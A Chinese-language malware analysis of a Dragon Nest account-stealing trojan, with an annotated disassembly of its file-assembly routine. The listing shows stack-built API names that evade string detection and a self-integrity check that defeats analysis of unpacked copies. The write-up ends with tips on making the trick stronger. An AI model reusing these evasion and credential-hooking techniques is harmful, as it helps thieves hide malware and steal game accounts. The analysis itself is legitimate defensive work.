首先说明,这种antidebug方式只会使部分分析者一时疏忽造成困扰,玩的是巧,而不是技术~
而确实在最开始的时候也给我造成了一些困扰,当然了,我很菜~ 言归正传~
这是一个“龙之谷”的盗号木马
1,从自身提取一个名为"MWAI"的资源,并释放到系统临时文件夹中,名称为kb****.bin (*的是0~9的随机数字)。
2,接着进行自身验证,通过比较当前进程文件的最后8个字节是否为7001000000010000来判断木马是否完整(比如脱壳的版本~这个木马用的PEcompact2.x壳),如果验证通过,则提取当前木马文件的后0x170个字节内容追加到刚刚释放的bin文件中,来完成bin文件的组装。
3,加载组装后的bin,并安装全局WH_GETMESSAGE钩子来获取账号信息
组装函数:
;-----------------------------------------------------------------------
; sub_00402A2E  --  "assemble the dropped .bin"   (name is the analyst's)
; C-equivalent: int __cdecl <assemble_bin>(LPCSTR lpBinPath)
; ABI:   32-bit Win32, cdecl (caller pops [ebp+8]); callee saves ebx/esi/edi
;
; What the listing shows:
;   1. Resolves GetModuleFileNameA, CloseHandle and CreateFileA through the
;      resolver at 00401931 (GetProcAddress-style, cdecl), with every DLL and
;      API name built on the stack one byte at a time -- there is no plain
;      string literal for string-based detection to match on.
;   2. Opens its OWN image (GetModuleFileNameA -> CreateFileA) and reads the
;      last DWORD; it must equal 0x00010000 or the append is skipped.  This
;      is the only integrity/anti-analysis check in the function.
;   3. Reads the DWORD at FILE_END-8 as a payload length (0x170 in the
;      original sample), seeks to FILE_END-length, malloc()s and reads it.
;   4. Opens lpBinPath, seeks to its end and appends the payload.
;
; In:    [ebp+8]  = lpBinPath (path of the .bin dropped earlier)
; Out:   eax = 0 on every path
; Locals: [ebp-4]   hKernel32, later reused as hSelf (own image handle)
;         [ebp-8]   payload length read from FILE_END-8
;         [ebp-C]   bytes read / bytes written
;         [ebp-10]  tail marker DWORD (compared with 0x10000)
;         [ebp-60]  CloseHandle   [ebp-64] CreateFileA   [ebp-68] malloc'd buf
;         [ebp-16C] own module path, MAX_PATH bytes
;         remaining locals are the byte-filled name strings
;
; Defender notes (all visible in this listing): the return values of
; CreateFileA, ReadFile, malloc and WriteFile are never checked; the length
; at FILE_END-8 is trusted exactly as read from the file; the malloc'd
; buffer is not freed in this function.  An unpacked or otherwise modified
; copy fails the marker test at 00402BF2, so nothing is appended and the
; dropped .bin stays incomplete -- the trick the write-up describes.
;-----------------------------------------------------------------------
00402A2E /$ 55 push ebp ; standard frame; [ebp+8] = lpBinPath
00402A2F |. 8BEC mov ebp, esp
00402A31 |. 81EC 6C010000 sub esp, 16C ; 0x16C bytes of locals (see header)
00402A37 |. 8065 D4 00 and byte ptr [ebp-2C], 0 ; NUL terminator for the "Kernel32.dll" buffer at [ebp-38]
00402A3B |. 53 push ebx ; save callee-saved registers
00402A3C |. 56 push esi
00402A3D |. 57 push edi
00402A3E |. C645 C8 4B mov byte ptr [ebp-38], 4B ; build "Kernel32.dll" byte by byte on the stack
00402A42 |. C645 C9 65 mov byte ptr [ebp-37], 65
00402A46 |. C645 CA 72 mov byte ptr [ebp-36], 72
00402A4A |. C645 CB 6E mov byte ptr [ebp-35], 6E
00402A4E |. C645 CC 65 mov byte ptr [ebp-34], 65
00402A52 |. C645 CD 6C mov byte ptr [ebp-33], 6C
00402A56 |. C645 CE 33 mov byte ptr [ebp-32], 33
00402A5A |. C645 CF 32 mov byte ptr [ebp-31], 32
00402A5E |. C645 D0 2E mov byte ptr [ebp-30], 2E
00402A62 |. C645 D1 64 mov byte ptr [ebp-2F], 64
00402A66 |. C645 D2 6C mov byte ptr [ebp-2E], 6C
00402A6A |. C645 D3 6C mov byte ptr [ebp-2D], 6C ; last char; terminator was written at 00402A37
00402A6E |. 60 pushad ; pushad/popad pair: no net effect (filler)
00402A6F |. 61 popad
00402A70 |. 8D45 C8 lea eax, dword ptr [ebp-38] ; eax -> "Kernel32.dll"
00402A73 |. 50 push eax ; /FileName
00402A74 |. FF15 00604000 call dword ptr [<&kernel32.LoadLibraryA>>; \LoadLibraryA("Kernel32.dll")
00402A7A |. 8945 FC mov dword ptr [ebp-4], eax ; [ebp-4] = HMODULE kernel32.dll
00402A7D |. 60 pushad ; pushad/popad pair: no net effect (filler)
00402A7E |. 61 popad
00402A7F |. 33DB xor ebx, ebx ; ebx = 0; used below as NULL/0 argument and as string terminator
00402A81 |. 395D FC cmp dword ptr [ebp-4], ebx
00402A84 |. 0F84 E4010000 je 00402C6E ; LoadLibraryA failed -> straight to the epilogue (returns 0)
00402A8A |. 8D45 A4 lea eax, dword ptr [ebp-5C] ; eax -> buffer that will hold "GetModuleFileNameA"
00402A8D |. C645 A4 47 mov byte ptr [ebp-5C], 47 ; 'G'
00402A91 |. 50 push eax ; arg2 for resolver: name (filled in below, before the call)
00402A92 |. C645 A5 65 mov byte ptr [ebp-5B], 65
00402A96 |. FF75 FC push dword ptr [ebp-4] ; arg1 for resolver: hKernel32
00402A99 |. C645 A6 74 mov byte ptr [ebp-5A], 74
00402A9D |. C645 A7 4D mov byte ptr [ebp-59], 4D
00402AA1 |. C645 A8 6F mov byte ptr [ebp-58], 6F
00402AA5 |. C645 A9 64 mov byte ptr [ebp-57], 64
00402AA9 |. C645 AA 75 mov byte ptr [ebp-56], 75
00402AAD |. C645 AB 6C mov byte ptr [ebp-55], 6C
00402AB1 |. C645 AC 65 mov byte ptr [ebp-54], 65
00402AB5 |. C645 AD 46 mov byte ptr [ebp-53], 46
00402AB9 |. C645 AE 69 mov byte ptr [ebp-52], 69
00402ABD |. C645 AF 6C mov byte ptr [ebp-51], 6C
00402AC1 |. C645 B0 65 mov byte ptr [ebp-50], 65
00402AC5 |. C645 B1 4E mov byte ptr [ebp-4F], 4E
00402AC9 |. C645 B2 61 mov byte ptr [ebp-4E], 61
00402ACD |. C645 B3 6D mov byte ptr [ebp-4D], 6D
00402AD1 |. C645 B4 65 mov byte ptr [ebp-4C], 65
00402AD5 |. C645 B5 41 mov byte ptr [ebp-4B], 41
00402AD9 |. 885D B6 mov byte ptr [ebp-4A], bl ; bl = 0 terminator; buffer now reads "GetModuleFileNameA"
00402ADC |. E8 50EEFFFF call 00401931 ; resolver (GetProcAddress-style): GetModuleFileNameA
00402AE1 |. 8BF0 mov esi, eax ; esi = GetModuleFileNameA
00402AE3 |. 8D45 D8 lea eax, dword ptr [ebp-28] ; eax -> buffer that will hold "CloseHandle"
00402AE6 |. 50 push eax ; resolver arg2: name
00402AE7 |. C645 D8 43 mov byte ptr [ebp-28], 43 ; build "CloseHandle" byte by byte
00402AEB |. FF75 FC push dword ptr [ebp-4] ; resolver arg1: hKernel32
00402AEE |. C645 D9 6C mov byte ptr [ebp-27], 6C
00402AF2 |. C645 DA 6F mov byte ptr [ebp-26], 6F
00402AF6 |. C645 DB 73 mov byte ptr [ebp-25], 73
00402AFA |. C645 DC 65 mov byte ptr [ebp-24], 65
00402AFE |. C645 DD 48 mov byte ptr [ebp-23], 48
00402B02 |. C645 DE 61 mov byte ptr [ebp-22], 61
00402B06 |. C645 DF 6E mov byte ptr [ebp-21], 6E
00402B0A |. C645 E0 64 mov byte ptr [ebp-20], 64
00402B0E |. C645 E1 6C mov byte ptr [ebp-1F], 6C
00402B12 |. C645 E2 65 mov byte ptr [ebp-1E], 65
00402B16 |. 885D E3 mov byte ptr [ebp-1D], bl ; terminator
00402B19 |. E8 13EEFFFF call 00401931 ; resolver: CloseHandle
00402B1E |. 83C4 10 add esp, 10 ; pop the 4 args of the two cdecl resolver calls
00402B21 |. 8945 A0 mov dword ptr [ebp-60], eax ; [ebp-60] = CloseHandle
00402B24 |. 8D45 E4 lea eax, dword ptr [ebp-1C] ; eax -> buffer that will hold "CreateFileA"
00402B27 |. C645 E4 43 mov byte ptr [ebp-1C], 43 ; 'C'
00402B2B |. 50 push eax ; resolver arg2: name (consumed at 00402B95)
00402B2C |. 8D45 B8 lea eax, dword ptr [ebp-48] ; eax -> second "Kernel32.dll" buffer
00402B2F |. 50 push eax ; /FileName for LoadLibraryA at 00402B8E
00402B30 |. C645 E5 72 mov byte ptr [ebp-1B], 72 ; |build "CreateFileA"
00402B34 |. C645 E6 65 mov byte ptr [ebp-1A], 65 ; |
00402B38 |. C645 E7 61 mov byte ptr [ebp-19], 61 ; |
00402B3C |. C645 E8 74 mov byte ptr [ebp-18], 74 ; |
00402B40 |. C645 E9 65 mov byte ptr [ebp-17], 65 ; |
00402B44 |. C645 EA 46 mov byte ptr [ebp-16], 46 ; |
00402B48 |. C645 EB 69 mov byte ptr [ebp-15], 69 ; |
00402B4C |. C645 EC 6C mov byte ptr [ebp-14], 6C ; |
00402B50 |. C645 ED 65 mov byte ptr [ebp-13], 65 ; |
00402B54 |. C645 EE 41 mov byte ptr [ebp-12], 41 ; |
00402B58 |. 885D EF mov byte ptr [ebp-11], bl ; |terminator
00402B5B |. C645 B8 4B mov byte ptr [ebp-48], 4B ; |build "Kernel32.dll" again (a fresh copy)
00402B5F |. C645 B9 65 mov byte ptr [ebp-47], 65 ; |
00402B63 |. C645 BA 72 mov byte ptr [ebp-46], 72 ; |
00402B67 |. C645 BB 6E mov byte ptr [ebp-45], 6E ; |
00402B6B |. C645 BC 65 mov byte ptr [ebp-44], 65 ; |
00402B6F |. C645 BD 6C mov byte ptr [ebp-43], 6C ; |
00402B73 |. C645 BE 33 mov byte ptr [ebp-42], 33 ; |
00402B77 |. C645 BF 32 mov byte ptr [ebp-41], 32 ; |
00402B7B |. C645 C0 2E mov byte ptr [ebp-40], 2E ; |
00402B7F |. C645 C1 64 mov byte ptr [ebp-3F], 64 ; |
00402B83 |. C645 C2 6C mov byte ptr [ebp-3E], 6C ; |
00402B87 |. C645 C3 6C mov byte ptr [ebp-3D], 6C ; |
00402B8B |. 885D C4 mov byte ptr [ebp-3C], bl ; |terminator
00402B8E |. FF15 00604000 call dword ptr [<&kernel32.LoadLibraryA>>; \LoadLibraryA("Kernel32.dll") a second time
00402B94 |. 50 push eax ; resolver arg1: hKernel32 (from this second load)
00402B95 |. E8 97EDFFFF call 00401931 ; resolver: CreateFileA
00402B9A |. 59 pop ecx ; discard resolver arg1
00402B9B |. 8945 9C mov dword ptr [ebp-64], eax ; [ebp-64] = CreateFileA
00402B9E |. 59 pop ecx ; discard resolver arg2
00402B9F |. 8D85 94FEFFFF lea eax, dword ptr [ebp-16C] ; eax -> path buffer
00402BA5 |. 68 04010000 push 104 ; nSize = MAX_PATH
00402BAA |. 50 push eax ; lpFilename = [ebp-16C]
00402BAB |. 53 push ebx ; hModule = NULL (the running executable)
00402BAC |. FFD6 call esi ; GetModuleFileNameA: path of the current executable
00402BAE |. 53 push ebx ; hTemplateFile = NULL
00402BAF |. 53 push ebx ; dwFlagsAndAttributes = 0
00402BB0 |. 6A 03 push 3 ; OPEN_EXISTING
00402BB2 |. 53 push ebx ; lpSecurityAttributes = NULL
00402BB3 |. 6A 01 push 1 ; FILE_SHARE_READ
00402BB5 |. 8D85 94FEFFFF lea eax, dword ptr [ebp-16C]
00402BBB |. 68 00000080 push 80000000 ; GENERIC_READ
00402BC0 |. 50 push eax ; lpFileName = own path
00402BC1 |. FF55 9C call dword ptr [ebp-64] ; CreateFileA: handle to the running executable's own file (result not checked)
00402BC4 |. 8B35 18604000 mov esi, dword ptr [<&kernel32.SetFileP>; esi = kernel32.SetFilePointer (GetModuleFileNameA no longer needed)
00402BCA |. 6A 02 push 2 ; /Origin = FILE_END
00402BCC |. 53 push ebx ; |pOffsetHi = NULL
00402BCD |. 6A FC push -4 ; |OffsetLo = FFFFFFFC (-4.)
00402BCF |. 50 push eax ; |hFile = own file
00402BD0 |. 8945 FC mov dword ptr [ebp-4], eax ; |[ebp-4] = hSelf (overwrites the HMODULE slot)
00402BD3 |. FFD6 call esi ; \SetFilePointer(hSelf, -4, NULL, FILE_END)
00402BD5 |. 8D45 F4 lea eax, dword ptr [ebp-C] ; eax -> bytesRead
00402BD8 |. 8B3D 14604000 mov edi, dword ptr [<&kernel32.ReadFile>; edi = kernel32.ReadFile
00402BDE |. 53 push ebx ; /pOverlapped = NULL
00402BDF |. 50 push eax ; |pBytesRead = [ebp-C]
00402BE0 |. 8D45 F0 lea eax, dword ptr [ebp-10] ; |
00402BE3 |. 6A 04 push 4 ; |BytesToRead = 4
00402BE5 |. 50 push eax ; |Buffer = [ebp-10]
00402BE6 |. FF75 FC push dword ptr [ebp-4] ; |hFile = hSelf
00402BE9 |. FFD7 call edi ; \ReadFile: the last 4 bytes of the running file (result not checked)
00402BEB |. 817D F0 00000>cmp dword ptr [ebp-10], 10000 ; marker test: last DWORD must be 0x00010000
00402BF2 |. 75 74 jnz short 00402C68 ; mismatch (e.g. an unpacked/modified copy) -> skip the append, just close hSelf
00402BF4 |. 6A 02 push 2 ; /Origin = FILE_END
00402BF6 |. 53 push ebx ; |pOffsetHi = 0
00402BF7 |. 6A F8 push -8 ; |OffsetLo = FFFFFFF8 (-8.)
00402BF9 |. FF75 FC push dword ptr [ebp-4] ; |hFile = hSelf
00402BFC |. FFD6 call esi ; \SetFilePointer(hSelf, -8, NULL, FILE_END)
00402BFE |. 8D45 F4 lea eax, dword ptr [ebp-C]
00402C01 |. 53 push ebx ; /pOverlapped = NULL
00402C02 |. 50 push eax ; |pBytesRead = [ebp-C]
00402C03 |. 8D45 F8 lea eax, dword ptr [ebp-8] ; |
00402C06 |. 6A 04 push 4 ; |BytesToRead = 4
00402C08 |. 50 push eax ; |Buffer = [ebp-8]
00402C09 |. FF75 FC push dword ptr [ebp-4] ; |hFile = hSelf
00402C0C |. FFD7 call edi ; \ReadFile: the DWORD at FILE_END-8 = payload length
00402C0E |. 8B45 F8 mov eax, dword ptr [ebp-8] ; eax = payload length (0x170 in the original sample); trusted as read, never validated
00402C11 |. 6A 02 push 2 ; /Origin = FILE_END
00402C13 |. F7D8 neg eax ; |eax = -length (two's complement)
00402C15 |. 53 push ebx ; |pOffsetHi = NULL
00402C16 |. 50 push eax ; |OffsetLo = -length (-368 for the original sample)
00402C17 |. FF75 FC push dword ptr [ebp-4] ; |hFile = hSelf
00402C1A |. FFD6 call esi ; \SetFilePointer(hSelf, -length, NULL, FILE_END)
00402C1C |. FF75 F8 push dword ptr [ebp-8] ; /size = length read from the file
00402C1F |. FF15 70604000 call dword ptr [<&MSVCRT.malloc>] ; \malloc(length); NULL return not checked
00402C25 |. 59 pop ecx ; pop malloc's cdecl arg
00402C26 |. 8945 98 mov dword ptr [ebp-68], eax ; [ebp-68] = payload buffer (never freed in this function)
00402C29 |. 8D4D F4 lea ecx, dword ptr [ebp-C] ; ecx -> bytesRead
00402C2C |. 53 push ebx ; pOverlapped = NULL
00402C2D |. 51 push ecx ; pBytesRead
00402C2E |. FF75 F8 push dword ptr [ebp-8] ; BytesToRead = length
00402C31 |. 50 push eax ; Buffer = malloc'd payload buffer
00402C32 |. FF75 FC push dword ptr [ebp-4] ; hFile = hSelf
00402C35 |. FFD7 call edi ; ReadFile: copy the trailing 'length' bytes of the running file into the buffer
00402C37 |. 53 push ebx ; hTemplateFile = NULL
00402C38 |. 53 push ebx ; dwFlagsAndAttributes = 0
00402C39 |. 6A 03 push 3 ; OPEN_EXISTING
00402C3B |. 53 push ebx ; lpSecurityAttributes = NULL
00402C3C |. 6A 01 push 1 ; FILE_SHARE_READ
00402C3E |. 68 000000C0 push C0000000 ; GENERIC_READ | GENERIC_WRITE
00402C43 |. FF75 08 push dword ptr [ebp+8] ; lpFileName = lpBinPath (the .bin dropped in the temp folder)
00402C46 |. FF55 9C call dword ptr [ebp-64] ; CreateFileA: open the dropped .bin for append (result not checked)
00402C49 |. 6A 02 push 2 ; Origin = FILE_END
00402C4B |. 8BF8 mov edi, eax ; edi = hBin (ReadFile pointer no longer needed)
00402C4D |. 53 push ebx ; lpDistanceToMoveHigh = NULL
00402C4E |. 53 push ebx ; lDistanceToMove = 0
00402C4F |. 57 push edi ; hFile = hBin
00402C50 |. FFD6 call esi ; SetFilePointer(hBin, 0, NULL, FILE_END): position at end of the .bin
00402C52 |. 8D45 F4 lea eax, dword ptr [ebp-C]
00402C55 |. 53 push ebx ; /pOverlapped = NULL
00402C56 |. 50 push eax ; |pBytesWritten = [ebp-C]
00402C57 |. FF75 F8 push dword ptr [ebp-8] ; |nBytesToWrite = length (0x170 for the original sample)
00402C5A |. FF75 98 push dword ptr [ebp-68] ; |Buffer = payload buffer
00402C5D |. 57 push edi ; |hFile = hBin
00402C5E |. FF15 10604000 call dword ptr [<&kernel32.WriteFile>] ; \WriteFile: append the tail of the running file to the .bin (result not checked)
00402C64 |. 57 push edi ; .bin assembly complete; only reached when the 0x10000 marker matched, i.e. the file was not unpacked/modified
00402C65 |. FF55 A0 call dword ptr [ebp-60] ; CloseHandle(hBin)
00402C68 |> FF75 FC push dword ptr [ebp-4] ; join point for the marker-mismatch branch
00402C6B |. FF55 A0 call dword ptr [ebp-60] ; CloseHandle(hSelf)
00402C6E |> 5F pop edi ; join point for the LoadLibraryA-failed branch; restore callee-saved regs
00402C6F |. 5E pop esi
00402C70 |. 33C0 xor eax, eax ; return 0 on every path
00402C72 |. 5B pop ebx
00402C73 |. C9 leave
00402C74 \. C3 retn
病毒作者可以选择把关键的东西放到这最后的0x170字节中,可以在某种程度上达到一箭双雕,既能防止反汇编器分析,还能让分析者在释放的bin中打转转。
试想分析者分析时晃过了这块,bin又不全~~
如果顺便把bin也加上壳效果会更好~
当然这一些都是基于分析者的能力和态度~~